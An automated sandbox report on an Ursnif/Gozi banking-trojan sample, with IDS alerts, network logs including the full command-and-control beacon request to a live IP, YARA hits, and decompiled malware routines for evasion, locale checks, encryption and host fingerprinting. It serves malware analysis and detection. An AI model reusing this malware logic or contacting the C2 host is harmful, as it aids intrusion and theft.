GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, CreateFileW
USER32.dll    LoadMenuA

Language of compilation system  Country where language is spoken
Sami Lappish                    Finland
Sami Lappish                    Norway
Sami Lappish                    Sweden
Snort IDS alerts
Timestamp                 Protocol  SID      Message                                                    Source             Destination
03/20/23-11:48:17.902010  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  192.168.2.4:49695  62.173.142.81:80
03/20/23-11:48:17.902010  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  192.168.2.4:49695  62.173.142.81:80
TCP packets
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Mar 20, 2023 11:48:17.838356972 CET  49695        80         192.168.2.4    62.173.142.81
Mar 20, 2023 11:48:17.901516914 CET  80           49695      62.173.142.81  192.168.2.4
Mar 20, 2023 11:48:17.901694059 CET  49695        80         192.168.2.4    62.173.142.81
Mar 20, 2023 11:48:17.902009964 CET  49695        80         192.168.2.4    62.173.142.81
Mar 20, 2023 11:48:17.964943886 CET  80           49695      62.173.142.81  192.168.2.4
Mar 20, 2023 11:48:17.966471910 CET  80           49695      62.173.142.81  192.168.2.4
Mar 20, 2023 11:48:17.966608047 CET  49695        80         192.168.2.4    62.173.142.81
Mar 20, 2023 11:48:17.968391895 CET  49695        80         192.168.2.4    62.173.142.81
Mar 20, 2023 11:48:18.031224966 CET  80           49695      62.173.142.81  192.168.2.4
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Mar 20, 2023 11:46:57.667893887 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
        Mar 20, 2023 11:46:57.699767113 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
        Mar 20, 2023 11:46:57.667893887 CET | 192.168.2.4 | 8.8.8.8 | 0x7302 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
        Mar 20, 2023 11:46:57.699767113 CET | 8.8.8.8 | 192.168.2.4 | 0x7302 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
        • 62.173.142.81
        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
        0 | 192.168.2.4 | 49695 | 62.173.142.81 | 80 | C:\Users\user\Desktop\server_(3).exe
        Timestamp | kBytes transferred | Direction | Data
        Mar 20, 2023 11:48:17.902009964 CET | 169 | OUT | GET /drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 62.173.142.81
        Connection: Keep-Alive
        Cache-Control: no-cache



        Target ID: 0
        Start time: 11:46:22
        Start date: 20/03/2023
        Path: C:\Users\user\Desktop\server_(3).exe
        Wow64 process (32bit): true
        Commandline: C:\Users\user\Desktop\server_(3).exe
        Imagebase: 0x400000
        File size: 181760 bytes
        MD5 hash: AA37B36EA7BA39B6C00AE1B01BADA3F7
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
        Reputation:low


          Control-flow Graph

          C-Code - Quality: 85%
          			E004019F1() {
          				long _v8;
          				char _v12;
          				char _v16;
          				void* _v40;
          				long _t28;
          				long _t30;
          				long _t31;
          				signed short _t33;
          				void* _t37;
          				long _t40;
          				long _t41;
          				void* _t48;
          				intOrPtr _t50;
          				signed int _t57;
          				signed int _t58;
          				long _t63;
          				long _t65;
          				intOrPtr _t66;
          				void* _t71;
          				void* _t75;
          				signed int _t77;
          				signed int _t78;
          				void* _t82;
          				intOrPtr* _t83;
          
          				_t28 = E00401D68();
          				_v8 = _t28;
          				if(_t28 != 0) {
          					return _t28;
          				}
          				do {
          					_t77 = 0;
          					_v12 = 0;
          					_t63 = 0x30;
          					do {
          						_t71 = E004012E6(_t63);
          						if(_t71 == 0) {
          							_v8 = 8;
          						} else {
          							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
          							_t67 = _t57;
          							_t58 = _t57 & 0x0000ffff;
          							_v8 = _t58;
          							if(_t58 == 4) {
          								_t63 = _t63 + 0x30;
          							}
          							_t78 = 0x13;
          							_t10 = _t67 + 1; // 0x1
          							_t77 =  *_t71 % _t78 + _t10;
          							E00401BA9(_t71);
          						}
          					} while (_v8 != 0);
          					_t30 = E00401688(_t77); // executed
          					_v8 = _t30;
          					Sleep(_t77 << 4); // executed
          					_t31 = _v8;
          				} while (_t31 == 0x15);
          				if(_t31 != 0) {
          					L30:
          					return _t31;
          				}
          				_v12 = 0;
          				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
          				if(_t33 == 0) {
          					__imp__GetSystemDefaultUILanguage();
          					_t67 =  &_v12;
          					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
          				}
          				if(_v12 == 0x5552) {
          					L28:
          					_t31 = _v8;
          					if(_t31 == 0xffffffff) {
          						_t31 = GetLastError();
          					}
          					goto L30;
          				} else {
          					if(E00401800(_t67,  &_v16) != 0) {
          						 *0x404178 = 0;
          						L20:
          						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
          						_t82 = _t37;
          						if(_t82 == 0) {
          							L27:
          							_v8 = GetLastError();
          							goto L28;
          						}
          						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
          						if(_t40 == 0) {
          							_t65 = GetLastError();
          							TerminateThread(_t82, _t65);
          							CloseHandle(_t82);
          							_t82 = 0;
          							SetLastError(_t65);
          						}
          						if(_t82 == 0) {
          							goto L27;
          						} else {
          							_t41 = WaitForSingleObject(_t82, 0xffffffff);
          							_v8 = _t41;
          							if(_t41 == 0) {
          								GetExitCodeThread(_t82,  &_v8);
          							}
          							CloseHandle(_t82);
          							goto L28;
          						}
          					}
          					_t66 = _v16;
          					_t83 = __imp__GetLongPathNameW;
          					_t48 =  *_t83(_t66, 0, 0); // executed
          					_t75 = _t48;
          					if(_t75 == 0) {
          						L18:
          						 *0x404178 = _t66;
          						goto L20;
          					}
          					_t22 = _t75 + 2; // 0x2
          					_t50 = E004012E6(_t75 + _t22);
          					 *0x404178 = _t50;
          					if(_t50 == 0) {
          						goto L18;
          					}
          					 *_t83(_t66, _t50, _t75); // executed
          					E00401BA9(_t66);
          					goto L20;
          				}
          			}

          APIs
            • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
            • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
          • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
          • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
          • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
          • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
          • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
          • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
          • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
          • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
          • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
          • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
          • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
          • String ID:
          • API String ID: 3475612337-0
          • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
          • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
          • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
          • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 50%
          			E005E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
          				int _v8;
          				long* _v12;
          				int _v16;
          				void* _v20;
          				long* _v24;
          				void* _v39;
          				char _v40;
          				void _v56;
          				int _v60;
          				intOrPtr _v64;
          				void _v67;
          				char _v68;
          				void* _t61;
          				int _t68;
          				signed int _t76;
          				int _t79;
          				int _t81;
          				void* _t85;
          				long _t86;
          				int _t90;
          				signed int _t94;
          				int _t101;
          				void* _t102;
          				int _t103;
          				void* _t104;
          				void* _t105;
          				void* _t106;
          
          				_t103 = __eax;
          				_t94 = 6;
          				_v68 = 0;
          				memset( &_v67, 0, _t94 << 2);
          				_t105 = _t104 + 0xc;
          				asm("stosw");
          				asm("stosb");
          				_v40 = 0;
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosw");
          				asm("stosb");
          				_t61 =  *0x5ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
          				if(_t61 == 0) {
          					_a8 = GetLastError();
          				} else {
          					_t101 = 0x10;
          					memcpy( &_v56, _a8, _t101);
          					_t106 = _t105 + 0xc;
          					_v60 = _t101;
          					_v67 = 2;
          					_v64 = 0x660e;
          					_v68 = 8;
          					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
          					if(_t68 == 0) {
          						_a8 = GetLastError();
          					} else {
          						_push(0);
          						_push( &_v40);
          						_push(1);
          						_push(_v12);
          						if( *0x5ea0e4() == 0) {
          							_a8 = GetLastError();
          						} else {
          							_t18 = _t103 + 0xf; // 0x10
          							_t76 = _t18 & 0xfffffff0;
          							if(_a4 != 0 && _t76 == _t103) {
          								_t76 = _t76 + _t101;
          							}
          							_t102 = E005E33DC(_t76);
          							_v20 = _t102;
          							if(_t102 == 0) {
          								_a8 = 8;
          							} else {
          								_v16 = 0;
          								_a8 = 0;
          								while(1) {
          									_t79 = 0x10;
          									_v8 = _t79;
          									if(_t103 <= _t79) {
          										_v8 = _t103;
          									}
          									memcpy(_t102, _a12, _v8);
          									_t81 = _v8;
          									_a12 = _a12 + _t81;
          									_t103 = _t103 - _t81;
          									_t106 = _t106 + 0xc;
          									if(_a4 == 0) {
          										_t85 =  *0x5ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
          									} else {
          										_t85 =  *0x5ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
          									}
          									if(_t85 == 0) {
          										break;
          									}
          									_t90 = _v8;
          									_v16 = _v16 + _t90;
          									_t102 = _t102 + _t90;
          									if(_t103 != 0) {
          										continue;
          									} else {
          										L17:
          										 *_a16 = _v20;
          										 *_a20 = _v16;
          									}
          									goto L21;
          								}
          								_t86 = GetLastError();
          								_a8 = _t86;
          								if(_t86 != 0) {
          									E005E61DA(_v20);
          								} else {
          									goto L17;
          								}
          							}
          						}
          						L21:
          						CryptDestroyKey(_v12);
          					}
          					CryptReleaseContext(_v24, 0);
          				}
          				return _a8;
          			}

          APIs
          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,005E5088,00000001,005E3ECE,00000000), ref: 005E1540
          • memcpy.NTDLL(005E5088,005E3ECE,00000010,?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740), ref: 005E1559
          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 005E1582
          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 005E159A
          • memcpy.NTDLL(00000000,775EC740,02BC9600,00000010), ref: 005E15EC
          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02BC9600,00000020,?,?,00000010), ref: 005E1615
          • GetLastError.KERNEL32(?,?,00000010), ref: 005E1644
          • GetLastError.KERNEL32 ref: 005E1676
          • CryptDestroyKey.ADVAPI32(00000000), ref: 005E1682
          • GetLastError.KERNEL32 ref: 005E168A
          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005E1697
          • GetLastError.KERNEL32(?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E169F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
          • String ID: @MqtNqt
          • API String ID: 3401600162-2883916605
          • Opcode ID: d5e1588aa9a428f57aa2d01206aeb3113b37128e324891d8cbc8dd40e3439b70
          • Instruction ID: 4c9a0059ac137ba5cbb50ed77f6a2663d7b00097f0d60826d96f518865afa14d
          • Opcode Fuzzy Hash: d5e1588aa9a428f57aa2d01206aeb3113b37128e324891d8cbc8dd40e3439b70
          • Instruction Fuzzy Hash: 94518AB1900288EFDB14DFA5CC88AAE7FB9FB54340F148429F995E6150D7309E14DB25
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 96%
          			E005E3BD3(char __eax, void* __esi) {
          				long _v8;
          				char _v12;
          				signed int _v16;
          				signed int _v20;
          				signed int _v28;
          				long _t34;
          				signed int _t39;
          				long _t50;
          				char _t59;
          				intOrPtr _t61;
          				void* _t62;
          				void* _t64;
          				char _t65;
          				intOrPtr* _t67;
          				void* _t68;
          				void* _t69;
          
          				_t69 = __esi;
          				_t65 = __eax;
          				_v8 = 0;
          				_v12 = __eax;
          				if(__eax == 0) {
          					_t59 =  *0x5ea310; // 0xd448b889
          					_v12 = _t59;
          				}
          				_t64 = _t69;
          				E005E71CD( &_v12, _t64);
          				if(_t65 != 0) {
          					 *_t69 =  *_t69 ^  *0x5ea344 ^ 0x6c7261ae;
          				} else {
          					GetUserNameW(0,  &_v8); // executed
          					_t50 = _v8;
          					if(_t50 != 0) {
          						_t62 = RtlAllocateHeap( *0x5ea2d8, 0, _t50 + _t50);
          						if(_t62 != 0) {
          							if(GetUserNameW(_t62,  &_v8) != 0) {
          								_t64 = _t62;
          								 *_t69 =  *_t69 ^ E005E56B9(_v8 + _v8, _t64);
          							}
          							HeapFree( *0x5ea2d8, 0, _t62);
          						}
          					}
          				}
          				_t61 = __imp__;
          				_v8 = _v8 & 0x00000000;
          				GetComputerNameW(0,  &_v8);
          				_t34 = _v8;
          				if(_t34 != 0) {
          					_t68 = RtlAllocateHeap( *0x5ea2d8, 0, _t34 + _t34);
          					if(_t68 != 0) {
          						if(GetComputerNameW(_t68,  &_v8) != 0) {
          							_t64 = _t68;
          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E005E56B9(_v8 + _v8, _t64);
          						}
          						HeapFree( *0x5ea2d8, 0, _t68);
          					}
          				}
          				asm("cpuid");
          				_t67 =  &_v28;
          				 *_t67 = 1;
          				 *((intOrPtr*)(_t67 + 4)) = _t61;
          				 *((intOrPtr*)(_t67 + 8)) = 0;
          				 *(_t67 + 0xc) = _t64;
          				_t39 = _v16 ^ _v20 ^ _v28;
          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
          				return _t39;
          			}

          APIs
          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E3C0A
          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E3C21
          • GetUserNameW.ADVAPI32(00000000,?), ref: 005E3C2E
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3C4F
          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E3C76
          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005E3C8A
          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005E3C97
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E3CB5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: HeapName$AllocateComputerFreeUser
          • String ID: Uqt
          • API String ID: 3239747167-2320327147
          • Opcode ID: 32daf39d380c944519404cd5d82e601da6c02cc9db7371ea39674fcc0ac48eb3
          • Instruction ID: 8bbb1be28bf8eec6837e6af5b5f3599547659bbcd95f6829a4b52cf194cdf30e
          • Opcode Fuzzy Hash: 32daf39d380c944519404cd5d82e601da6c02cc9db7371ea39674fcc0ac48eb3
          • Instruction Fuzzy Hash: 8A311CB1A00245AFD718DF79CDC5A6ABBF9FF58300F614429E585E7210E730EE04AB10
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 38%
          			E005E421F(char _a4, void* _a8) {
          				void* _v8;
          				void* _v12;
          				char _v16;
          				void* _v20;
          				char _v24;
          				char _v28;
          				char _v32;
          				char _v36;
          				char _v40;
          				void* _v44;
          				void** _t33;
          				void* _t40;
          				void* _t43;
          				void** _t44;
          				intOrPtr* _t47;
          				char _t48;
          
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				asm("stosd");
          				_v20 = _a4;
          				_t48 = 0;
          				_v16 = 0;
          				_a4 = 0;
          				_v44 = 0x18;
          				_v40 = 0;
          				_v32 = 0;
          				_v36 = 0;
          				_v28 = 0;
          				_v24 = 0;
          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
          					_t33 =  &_v8;
          					__imp__(_v12, 8, _t33);
          					if(_t33 >= 0) {
          						_t47 = __imp__;
          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
          						_t44 = E005E33DC(_a4);
          						if(_t44 != 0) {
          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
          							if(_t40 >= 0) {
          								memcpy(_a8,  *_t44, 0x1c);
          								_t48 = 1;
          							}
          							E005E61DA(_t44);
          						}
          						NtClose(_v8); // executed
          					}
          					NtClose(_v12);
          				}
          				return _t48;
          			}

          APIs
          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 005E4266
          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 005E4279
          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E4295
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 005E42B2
          • memcpy.NTDLL(?,00000000,0000001C), ref: 005E42BF
          • NtClose.NTDLL(?), ref: 005E42D1
          • NtClose.NTDLL(00000000), ref: 005E42DB
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
          • String ID:
          • API String ID: 2575439697-0
          • Opcode ID: 95bba7bbefef5ea394fbef7bd7bd18cf72152cdb18b47254b5ff2c783543ca35
          • Instruction ID: 4bbccb9f228fc3da50a717bf8e2eb3f962432b39bd2e79b701f74f4b507ac372
          • Opcode Fuzzy Hash: 95bba7bbefef5ea394fbef7bd7bd18cf72152cdb18b47254b5ff2c783543ca35
          • Instruction Fuzzy Hash: B12157B1900129BBDB019F95CC89ADEBFBCFB48750F104022FA40E6120D7718B44DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          Control-flow graph of E004015B0 (legend: Executed / Not Executed): blocks 4015b0-401607 (GetSystemTimeAsFileTime), 40160e-401627 (CreateFileMappingW), 401642-401650 (MapViewOfFile), 401634-40163b, 401660-401666 and 401671-401677 (GetLastError), 401668-40166f (CloseHandle), 401679-40167f (return).
          C-Code - Quality: 69%
          			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
          				intOrPtr _v12;
          				struct _FILETIME* _v16;
          				short _v60;
          				struct _FILETIME* _t14;
          				intOrPtr _t15;
          				long _t18;
          				void* _t19;
          				void* _t22;
          				intOrPtr _t31;
          				long _t32;
          				void* _t34;
          
          				_t31 = __edx;
          				_t14 =  &_v16;
          				GetSystemTimeAsFileTime(_t14);
          				_push(0x192);
          				_push(0x54d38000);
          				_push(_v12);
          				_push(_v16);
          				L00402026();
          				_push(_t14);
          				_v16 = _t14;
          				_t15 =  *0x404184;
          				_push(_t15 + 0x4051ca);
          				_push(_t15 + 0x4051c0);
          				_push(0x16);
          				_push( &_v60);
          				_v12 = _t31;
          				L00402020();
          				_t18 = _a4;
          				if(_t18 == 0) {
          					_t18 = 0x1000;
          				}
          				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
          				_t34 = _t19;
          				if(_t34 == 0) {
          					_t32 = GetLastError();
          				} else {
